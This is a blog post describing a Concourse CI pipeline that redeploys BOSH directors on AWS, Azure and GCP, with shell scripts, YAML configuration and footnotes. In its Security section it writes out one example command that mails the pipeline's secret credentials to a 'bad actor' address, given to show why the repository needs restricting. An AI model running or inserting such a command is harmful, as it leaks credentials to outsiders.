“BOSH deploys Concourse, and Concourse deploys BOSH” —Cloud Foundry koan
A BOSH Director is a VM (virtual machine) orchestrator which is itself a VM. BOSH solves the problem of keeping its VMs’ applications (operating systems (stemcells) and releases) up-to-date with the command bosh deploy; however, this raises the question, “What keeps the BOSH Director itself up-to-date?” [Quis custodiet?]
We explore using Concourse, a Continuous Integration (CI) server, and bosh-deployment [Updating BOSH], in order to create a Concourse pipeline which updates, in turn, a BOSH director on AWS (Amazon Web Services), on Microsoft Azure, and GCP (Google Cloud Platform). Updating all three BOSH directors can be accomplished with a single click. [One click] Best of all, our directors are re-deployed with a recent stemcell, BOSH release, and CPI release. [How recent?]
0. Overview
Our Concourse pipeline is publicly-viewable, and can be seen at https://ci.nono.io/teams/main/pipelines/BOSH. It’s a straightforward pipeline which consists of three jobs, one for each director on each IaaS (Infrastructure as a Service): bosh-aws.nono.io, bosh-azure.nono.io, and bosh-gce.nono.io.
Below is a diagram of our Concourse configuration which describes the pipeline in greater detail. Note that we keep our credentials (e.g. our AWS access key and secret) in LastPass (see items in red), but LastPass is not strictly necessary: credentials can be embedded directly in the BOSH manifests, can be passed as variables during the BOSH manifest creation, or can be maintained as files on the local hard drive.
1. Concourse Tasks
To build our Concourse pipeline, we begin with the smallest configurable component, the Concourse task.
The Concourse task is often a set of Concourse resources (e.g. GitHub repositories containing BOSH manifests), environment variables (e.g. ${IAAS}, the IaaS to which we’re deploying), and, perhaps most importantly, the shell script which deploys the director.
1.0 Concourse Task Shell Script
Here is the annotated shell script our Concourse tasks use to deploy our BOSH director:
[Note: see next section, Simplify the Concourse Task, for a simpler task shell script; it’s a better starting point. We customize our BOSH directors in a manner which complicates our task shell script.]
#!/bin/bash
# We abort the script as soon as we hit an error (as soon as a command exits
# with a non-zero exit status)
set -e
# `cunnie-deployments` is the checked-out GitHub repo that contains our BOSH
# manifests and our directors' `-state.json` files; it also contains this
# script (task script) and task definition.
pushd cunnie-deployments
# We invoke the script that generates our BOSH director's manifest, e.g.
# `aws.sh`, `azure.sh`. The output, the BOSH director's manifest, is named
# `bosh-$IAAS.yml`, e.g. `bosh-aws.yml`
bin/$IAAS.sh
# Does ${DEPLOYMENTS_YML} have a complete set of interpolated variables?
# Abort if not (`--var-errs`).
bosh int bosh-$IAAS.yml \
  --var-errs \
  -l <(echo "$DEPLOYMENTS_YML") \
  -l <(curl https://raw.githubusercontent.com/cunnie/sslip.io/master/conf/sslip.io%2Bnono.io.yml) \
  > /dev/null
# We attempt to deploy our BOSH director. We prepare a git commit message
# regardless whether our attempt succeeds or fails because we need to retain any
# change to the BOSH director's `-state.json` file. This is necessary in cases
# where a deploy proceeds far enough to create a broken director VM, for
# subsequent deploys must be able to destroy the broken director VM in order to
# free up its IP address so that the current deploy will succeed. The crucial
# information needed to destroy the broken director VM is its VM's ID, which is
# recorded in the `-state.json` file.
# Note that `set -e` does not trigger an abort if the command that returns a
# non-zero exit code is the subject of an `if` block, i.e. `if bosh create-env`;
# this gives us the breathing room to commit our results regardless of whether
# `bosh create-env` succeeded or failed
if bosh create-env bosh-$IAAS.yml \
  -l <(echo "$DEPLOYMENTS_YML") \
  -l <(curl https://raw.githubusercontent.com/cunnie/sslip.io/master/conf/sslip.io%2Bnono.io.yml); then
  GIT_COMMIT_MESSAGE="CI PASS: $IAAS BOSH deploy :airplane:"
  DEPLOY_EXIT_STATUS=0
else
  GIT_COMMIT_MESSAGE="CI FAIL: $IAAS BOSH deploy :airplane:"
  DEPLOY_EXIT_STATUS=1
fi
# Do we need to commit anything? If a new director hasn't been deployed (most
# often because there's been no change to the manifest, releases, or stemcell),
# then we don't need to commit
if ! git diff --quiet HEAD --; then
  # If we're in this block, then there has been a deployment. Let's set our
  # git author to avoid git's `*** Please tell me who you are.` error.
  git config --global user.name "Concourse CI"
  git config --global user.email brian.cunnie@gmail.com
  # We check out our branch's HEAD because Concourse's git-resource leaves us
  # in `detached HEAD` state. ${DEPLOYMENTS_BRANCH} is typically set to
  # `master`, but may be set to something else (usually while testing).
  git checkout $DEPLOYMENTS_BRANCH
  git add .
  git commit -m"$GIT_COMMIT_MESSAGE"
fi
popd
# We copy our repo with its new commit to a new directory. The Concourse job,
# after it finishes running this task, will push the new commit to GitHub.
# Note that `cp -R` works as well as `rsync`; we use `rsync` by force of
# habit.
rsync -aH cunnie-deployments/ cunnie-deployments-with-state/
# We exit with the return code of `bosh create-env`; if the deploy failed, then
# this Concourse task failed
exit $DEPLOY_EXIT_STATUS
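The interplay between `set -e` and the `if` block described in the comments above can be seen in isolation. The following is a minimal sketch, not part of our task script: `fake_create_env` is a hypothetical stand-in for `bosh create-env` that always fails, and the commit message is shortened for illustration.

```shell
#!/bin/bash
# Abort on any failing command, exactly as the task script does
set -e

# Hypothetical stand-in for `bosh create-env`; it always fails
fake_create_env() { return 1; }

# Because the failing command is the condition of the `if`, `set -e` does not
# abort the script; we fall through to the `else` branch instead
if fake_create_env; then
  GIT_COMMIT_MESSAGE="CI PASS: demo BOSH deploy"
  DEPLOY_EXIT_STATUS=0
else
  GIT_COMMIT_MESSAGE="CI FAIL: demo BOSH deploy"
  DEPLOY_EXIT_STATUS=1
fi

# We still reach this line, which is where the real script commits the
# `-state.json` file before exiting with $DEPLOY_EXIT_STATUS
echo "$GIT_COMMIT_MESSAGE (status to report: $DEPLOY_EXIT_STATUS)"
```

Had `fake_create_env` been called on a line of its own, the script would have stopped there and the final `echo` would never have run.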
For those interested in the scripts which generate the BOSH director manifests (e.g. aws.sh), they were covered in an earlier blog post. For links to the scripts and the manifests they generate, see the table below:
IaaS | Script | Generated Manifest |
---|---|---|
AWS | aws.sh | bosh-aws.yml |
Azure | azure.sh | bosh-azure.yml |
GCP | gce.sh | bosh-gce.yml |
1.1 Simplify the Concourse Task Script
Simplify the Concourse task script. Specifically, inline the bosh-${IAAS}.sh script, then collapse the two bosh interpolate commands into the singular bosh create-env command.
Start with a simple Concourse task script. Really. Don’t use the task script we use [Why so complicated?], the one listed above. Instead, start with a simplified task script, like bosh-simple.sh. We have tested it; it successfully deploys a director.
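To give a feel for what "collapsing into a single bosh create-env" can look like, here is a dry-run sketch that only prints the command rather than running it. It is not the contents of bosh-simple.sh. The function name, the creds file name, and the deployments.yml vars file are assumptions made for illustration, as is the mapping of our `gce` name onto a `gcp/` directory in bosh-deployment.

```shell
#!/bin/bash
# Dry run: print the single `bosh create-env` command a simplified task might
# execute for a given IaaS. Nothing is deployed.
create_env_cmd() {
  local iaas="$1" cpi_dir
  case "$iaas" in
    gce) cpi_dir=gcp ;;       # assumption: GCP ops files live under gcp/
    *)   cpi_dir="$iaas" ;;   # aws, azure
  esac
  local cmd=(
    bosh create-env bosh-deployment/bosh.yml
    -o "bosh-deployment/${cpi_dir}/cpi.yml"
    --state "cunnie-deployments/bosh-${iaas}-state.json"
    --vars-store "cunnie-deployments/bosh-${iaas}-creds.yml"  # hypothetical file name
    -l deployments.yml                                        # hypothetical vars file
  )
  # Join the array elements with single spaces
  echo "${cmd[*]}"
}

create_env_cmd aws
```

Building the command as an array keeps each flag on its own line, which makes it easier to add or remove operations files later.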
1.2 Concourse Task Configuration file
Now that we have our task’s shell script, we turn our attention to our task’s (YAML) configuration file. It can be viewed on GitHub, and is displayed below, too:
---
platform: linux
image_resource:
  type: docker-image
  source:
    repository: cunnie/fedora-golang-bosh
inputs:
- name: cunnie-deployments
- name: bosh-deployment
outputs:
- name: cunnie-deployments-with-state
params:
  # vainly default branch to master, but it's always overridden from the pipeline
  DEPLOYMENTS_BRANCH: 'master'
  DEPLOYMENTS_YML: ''
  IAAS: ''
run:
  path: cunnie-deployments/ci/tasks/bosh.sh
Notes:
image_resource:
We use a custom-built Docker image, cunnie/fedora-golang-bosh (https://hub.docker.com/r/cunnie/fedora-golang-bosh/~/dockerfile/), but you may choose to use your own Docker image; just be sure that the BOSH CLI is installed. Our image is fairly hefty (450 MB), for it has a rich set of tools available to us when we need to intercept the container to troubleshoot a build.
inputs:
We have two inputs: bosh-deployment, a git repo which contains the manifests and tools necessary to deploy a BOSH director (this is the canonical way to deploy a BOSH director), and cunnie-deployments, a git repo which contains our BOSH directors’ manifests and state files. Also, this repo contains the required Concourse task definition (ci/tasks/bosh.yml) and script (ci/tasks/bosh.sh).
outputs:
We have one output, cunnie-deployments-with-state, which is the same as the input, cunnie-deployments. Concourse prohibits an input from also being an output, so our script copies the contents of one to the other. cunnie-deployments-with-state includes the commits made by the task (in the case of a deploy, the state file and possibly the BOSH director’s manifest). This output is used by a subsequent step in the Concourse job which will push any git commits to GitHub (although this Concourse task may make git commits, it won’t push them; it leaves that responsibility to the Concourse job).
params:
DEPLOYMENTS_BRANCH is almost always set to master; it refers to the branch in the cunnie-deployments repo. IAAS is either aws, azure, or gce. DEPLOYMENTS_YML is YAML-formatted and contains secrets needed to deploy; sample contents can be viewed in an earlier blog post.
[Note: you may opt to bypass the task configuration file completely and embed the necessary information into pipeline.yml; here is an example of embedding the task configuration directly into the pipeline.]
2. Concourse Jobs
The Concourse job is straightforward:
- It checks out the cunnie-deployments and bosh-deployment git repos
- It runs the task which deploys the BOSH director to the specified IaaS
- It pushes changes to the director manifest (bosh-${IAAS}.yml) and the director state (bosh-${IAAS}-state.json) to the cunnie-deployments repo regardless of whether the deploy succeeded or failed (i.e. the ensure directive)
Here is the Concourse job definition which deploys the BOSH director to the AWS IaaS:
jobs:
- name: bosh-aws.nono.io
  plan:
  - get: cunnie-deployments
  - get: bosh-deployment
  - task: deploy
    file: cunnie-deployments/ci/tasks/bosh.yml
    params:
      DEPLOYMENTS_BRANCH: master
      DEPLOYMENTS_YML: ((deployments_yml))
      IAAS: aws
    ensure:
      put: cunnie-deployments
      params:
        repository: cunnie-deployments-with-state/
3. Concourse Pipeline
The full Concourse pipeline (pipeline.yml) can be seen here. Below is an abbreviated portion which shows the Concourse resources and the first job (which deploys the AWS BOSH director):
# fly -t nono sp -p BOSH -c ~/workspace/deployments/ci/pipeline.yml -v github_deployments_key="$(lpass show --note github_deployments_key)" -v deployments_yml="$(lpass show --note deployments.yml)"
jobs:
- name: bosh-aws.nono.io
  plan:
  - get: cunnie-deployments
  - get: bosh-deployment
  - task: deploy
    file: cunnie-deployments/ci/tasks/bosh.yml
    params:
      DEPLOYMENTS_BRANCH: master
      DEPLOYMENTS_YML: ((deployments_yml))
      IAAS: aws
    ensure:
      put: cunnie-deployments
      params:
        repository: cunnie-deployments-with-state/
# Other jobs redacted for brevity
resources:
- name: cunnie-deployments
  type: git
  source:
    uri: git@github.com:cunnie/deployments.git
    private_key: ((github_deployments_key))
    branch: master
- name: bosh-deployment
  type: git
  source:
    uri: https://github.com/cloudfoundry/bosh-deployment.git
Notes:
The first line is a convenience comment; it shows the fly (Concourse CLI) command which updates the Concourse server’s pipeline after changes have been made to the pipeline.yml file. We cut-and-paste that comment into our shell whenever we make a change to pipeline.yml in order to propagate the changes to the pipeline to our Concourse server:
fly -t nono sp -p BOSH -c ~/workspace/deployments/ci/pipeline.yml -v github_deployments_key="$(lpass show --note github_deployments_key)" -v deployments_yml="$(lpass show --note deployments.yml)"
We have already discussed deployments_yml (i.e. the Concourse task environment variable/parameter DEPLOYMENTS_YML), but the other variable, github_deployments_key, warrants discussion. It is a GitHub deploy key which allows our job to push changes to the cunnie-deployments repo [Interpolation].
We’d like to discuss how we stop the pipeline when the deploy of a BOSH director fails. We use Concourse’s passed directive. For example, if our deploy of the AWS director fails, we do not want to deploy the Azure director.
The following shows the diff between the job to deploy the AWS director and the job to deploy the Azure director. Pay special attention to the passed and trigger directives: the deploy of the Azure director is kicked off if and only if there has been a successful deploy of the AWS director. This limits the damage caused by a flawed configuration: only one director is knocked offline (typically the first one, AWS), not all three.
-- name: bosh-aws.nono.io
+- name: bosh-azure.nono.io
   plan:
   - get: cunnie-deployments
+    passed: [ bosh-aws.nono.io ]
+    trigger: true
   - get: bosh-deployment
+    passed: [ bosh-aws.nono.io ]
+    trigger: true
   - task: deploy
     file: cunnie-deployments/ci/tasks/bosh.yml
     params:
       DEPLOYMENTS_BRANCH: master
       DEPLOYMENTS_YML: ((deployments_yml))
-      IAAS: aws
+      IAAS: azure
     ensure:
       put: cunnie-deployments
       params:
4. Security
Restrict your Concourse teams to people you trust, and don’t unnecessarily expose your pipelines or publish your pipelines’ configurations (.yml files). Similarly, restrict access to your GitHub repo which has your director manifests and Concourse scripts.
Our credentials are stored in our Concourse pipeline, and they can be easily revealed by a trusted user with the following command:
fly -t nono get-pipeline -p BOSH
These credentials include IaaS credentials, which will allow a bad actor to spin up multiple VMs to run, say, Bitcoin mining. A co-worker of the author whose credentials were compromised had unauthorized AWS charges exceeding $3k.
It is also important to restrict access to the GitHub repo which contains the scripts that are run. Although the repo does not contain credentials, it enables the execution of commands which can reveal the credentials. For example, the following line of code could be added to the ci/tasks/bosh.sh script to email the credentials to the bad actor:
echo ${DEPLOYMENTS_YML} | mail -s "secret credentials" bad.actor@mailinator.com
Footnotes
[Quis custodiet?] “Who updates the VM [BOSH director] that keeps the other VMs updated?” is the question, versions of which have been asked as long ago as the days of the Roman poet Juvenal, who famously asked, “Quis custodiet ipsos custodes?” and as recently as this century by comic book writer Alan Moore, who phrased it, “Who watches the Watchmen?”
[How recent?]
How fresh is bosh-deployment? Fresh. bosh-deployment is quite an active git repo, typically updated several times or more each week. It’s the tool that the BOSH team, and many Cloud Foundry teams, use to keep their BOSH directors current.
[Updating BOSH] In the early days, the BOSH micro plugin was the mechanism to update the BOSH director. There were several drawbacks to the micro plugin, one of which is that it forced the BOSH CLI to have an understanding of the API for various IaaSes, breaking the Cloud Layer abstraction model.
Another drawback of the BOSH micro plugin was that it was brittle, so much so that it was a common pattern to deploy a BOSH director whose sole purpose was to deploy the “real” BOSH director. “Ha!” one might ask, “But how did you keep that first BOSH director up-to-date?” The answer is simple: you didn’t. You left that first BOSH director running and never touched it except to redeploy the “real” BOSH director. You might spin it down if you weren’t using it, but you never deleted it or updated it.
These were serious problems, and to address them the BOSH Core team wrote bosh-init, a Golang-based executable whose purpose was to deploy BOSH directors. It adhered to the Cloud Layer abstraction models (it used the existing CPIs (Cloud Provider Interfaces) for the existing IaaSes (VMware vSphere, Google Cloud Platform (GCP), OpenStack, Microsoft Azure, among others)).
By April 30, 2015, bosh-init was production-ready, and the BOSH documentation was updated to reflect the new world order.
But all was not perfect in the Garden of Eden, for the introduction of bosh-init split the CLIs: whereas before there was one BOSH CLI, now there were two: bosh, the original Ruby-based CLI for managing a BOSH director’s deployment, and bosh-init for deploying a BOSH director itself. In many ways this resembled the Western Schism, a dark chapter in the Roman Catholic church when there were two popes (who had the terrible habit of excommunicating each other). The BOSH development team remedied this situation by creating a third CLI, the Golang-based CLI. In this regard, the BOSH development team’s approach mirrored the approach attempted by the Catholic cardinals, who elected a third pope. The BOSH team’s approach succeeded, but the cardinals’ didn’t (they were left with three popes running around excommunicating each other).
[One click] It’s technically possible to kick off the builds with zero clicks — to kick off the build automatically if, say, a commit is pushed to the bosh-deployment repository. The modification to the pipeline is trivial:
 - name: bosh-aws.nono.io
   plan:
   - get: cunnie-deployments
   - get: bosh-deployment
+    trigger: true
   - task: deploy
However, the decision to trigger automatically is not without risks: the BOSH director may be in the middle of a delicate task, such as updating a deployment, and won’t have the opportunity to gracefully bring itself down, for bosh create-env is relentless, brooks no delays, and gives no quarter.
On a more technical note, although bosh create-env will attempt to contact the BOSH agent on the original BOSH director in order to terminate the jobs and shut down the VM, it does not run the drain scripts (scripts which allow the BOSH jobs to clean up and get into a state where they can be safely stopped).
There is discussion within the BOSH development team whether to modify the behavior of bosh create-env to make it run the drain scripts. On the positive side, it will allow a more cavalier approach to re-deploying the director, and make the behavior of bosh create-env more closely approximate the behavior of a BOSH director. On the downside, the time to deploy a BOSH director may vary widely, dependent on the time it takes for the drain scripts to complete.
[Interpolation] Our GitHub deploy key resembles the following (not our real key) [Elliptic-curve] :
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIMxcR2wlxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqY/VyDTL
AwEHoUQDQgAEmBUxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxjY98wOPVZ
Ayz++1vHXODWeiC/CjNu7hOVaB682ZZfCw==
-----END EC PRIVATE KEY-----
Concourse, when passed the flag ... -v github_deployments_key="$(lpass show --note github_deployments_key)", will interpolate this section of pipeline.yml:
  type: git
  source:
    uri: git@github.com:cunnie/deployments.git
    private_key: ((github_deployments_key))
After interpolation, the pipeline looks like this:
- name: cunnie-deployments
  type: git
  source:
    uri: git@github.com:cunnie/deployments.git
    # previously: private_key: ((github_deployments_key))
    private_key: |
      -----BEGIN EC PRIVATE KEY-----
      MHcCAQEEIMxcR2wlxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqY/VyDTL
      AwEHoUQDQgAEmBUxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxjY98wOPVZ
      Ayz++1vHXODWeiC/CjNu7hOVaB682ZZfCw==
      -----END EC PRIVATE KEY-----
If your pipeline is not public, it may be easier to skip variable interpolation and embed the credential(s) directly.
[Why so complicated?]
Our Concourse task is complicated (i.e. bosh.sh calls bosh-${IAAS}.sh, and the bosh CLI is invoked three times) because we have requirements beyond merely deploying a BOSH director:
- We retain intermediate BOSH manifests (e.g. bosh-aws.yml), manifests that are completely populated with the exception of the secrets (passwords, credentials, private keys). The sole purpose of the first bosh interpolate command is to generate the intermediate manifest.
  We realize that our love of the intermediate manifests is not wholly rational: time was when a working BOSH manifest was a precious thing, something to tend to and to preserve. With the advent of bosh-deployment, which reliably generates BOSH manifests, the intermediate manifests have diminished in importance, and are now merely artifacts of a bygone age. And yet we still cling to them, for they provide a sense of comfort, like a mother’s hot apple pie.
- We prefer to set our own passwords rather than use the ones auto-generated [auto-passwords] by the BOSH CLI. This has two implications:
  - It forces us to set the password variables in a counter-intuitive manner (e.g. bosh interpolate ... -v admin_password='((admin_password))' ...), which says, in effect, “replace all occurrences of ‘((admin_password))’ with ‘((admin_password))’.” This prevents the BOSH CLI from using its auto-generated passwords and paves the way to subsequently interpolate our passwords. This adds several lines to our scripts.
  - It forces us to check to make sure that we haven’t overlooked any variables (i.e. we run bosh interpolate --var-errs ...), so that, for example, our director’s password is set to IReturnedAndSawUnderTheSun and not ((admin_password)). This adds several more lines to our scripts.
- Our BOSH director uses certificates issued by a recognized CA (Certificate Authority) (in our case, Comodo). This requires us to create a manifest operations file (e.g. etc/aws.yml) which we pass to bosh interpolate and which overrides the auto-generated SSL certificate & key with our certificate & key.
- Some of our BOSH directors (e.g. bosh-aws.nono.io) are more than mere BOSH directors: they are also nginx servers (web servers), DNS (Domain Name System) servers, and NTP (Network Time Protocol) servers. This adds three more lines to our scripts.
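The failure mode that the --var-errs check guards against, a literal ((placeholder)) surviving into the deployed manifest, can be illustrated with a rough grep-based approximation. This is a sketch only: it is not how the BOSH CLI implements --var-errs, and the function names are hypothetical.

```shell
#!/bin/bash
# Succeeds (exit status 0) if the given text still contains a ((placeholder))
has_unresolved_vars() {
  grep -Eq '\(\([A-Za-z0-9_./-]+\)\)' <<<"$1"
}

# Report whether a manifest fragment is safe to deploy
check_manifest() {
  if has_unresolved_vars "$1"; then
    echo "unresolved"
  else
    echo "ok"
  fi
}

check_manifest 'admin_password: ((admin_password))'          # prints "unresolved"
check_manifest 'admin_password: IReturnedAndSawUnderTheSun'  # prints "ok"
```

The real check is stricter, since bosh interpolate knows exactly which variables the manifest references, but the intent is the same: refuse to proceed while any secret is still a placeholder.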
Note: one advantage of using CA-issued certificates and easy-to-remember passwords is that it enables one to reach the BOSH director via the CLI without needing the creds.yml file: one can sit at a new workstation, type bosh -e bosh-gce.nono.io login, and proceed to manage deployments, releases, stemcells, etc.
[auto-passwords] The BOSH CLI generates high-entropy passwords when the --vars-store flag is passed. Here is a list of sample passwords that bosh create-env --vars-store=... creates:
admin_password: qn7hc6zsq0nphhsvojx3
blobstore_agent_password: iut5wdyeo5kkhvqoerj0
blobstore_director_password: wm0qgnzdwgy8k1hnm4nq
hm_password: plk829eob45khq6o9dl5
mbus_bootstrap_password: nf16h5e9j120uqp35hlr
nats_password: gr4s0xmj4s5iccqv69dt
postgres_password: 7nxuq714hxcta513778g
registry_password: ffxnhu4xtgh7lsxu7xpl
Note that the passwords are 20 bytes long and consist of a random sequence of numbers and lowercase letters. Each byte can be one of 36 possibilities (10 numbers plus 26 letters). Given that there are 20 bytes, the total number of combinations is 36^20, approximately 1.34 × 10^31, effectively rendering the password immune to a brute-force attack: even if you could make a million attempts every second, it would still require 4 × 10^17 years to exhaust all combinations. In other words, you’d crack the password long after the Stelliferous Era ended and you were well into the Degenerate Era.
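The arithmetic above can be checked from the shell. The sketch below uses awk's floating-point arithmetic, so the results are approximate; the function names are ours, and the year length of 365.25 days is an assumption.

```shell
#!/bin/bash
# Number of possible passwords: (alphabet size) ^ (password length)
keyspace() {
  awk -v n="$1" -v len="$2" 'BEGIN { printf "%.2e\n", n ^ len }'
}

# Years needed to try every password at a given number of attempts per second
years_to_exhaust() {
  awk -v n="$1" -v len="$2" -v rate="$3" \
    'BEGIN { printf "%.1e\n", (n ^ len) / rate / (365.25 * 86400) }'
}

keyspace 36 20                  # prints 1.34e+31
years_to_exhaust 36 20 1000000  # prints 4.2e+17
```

On average an attacker would need only half that time, which does not change the conclusion.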
[Elliptic-curve] We use elliptic-curve cryptography (ECC) keys, for they are much shorter than an RSA key of equivalent strength, and thus more manageable. Unfortunately, they are not universally accepted (e.g. AWS will respond with “Error importing Key Pair Key is not in valid OpenSSH public key format” when importing an EC public key).
Where elliptic-curve cryptography is concerned, GitHub is ahead of the proverbial curve, and AWS, behind.
Corrections & Updates
2017-12-01
We suggest simplifying the Concourse task script. The Concourse task script executes the BOSH CLI three times (bosh int twice and bosh create-env once), but need only execute it once (bosh create-env) when intermediate artifacts aren’t desired.
2017-11-25
David McClure pointed out that the OpenStack link was missing; it has been added. Thanks, David.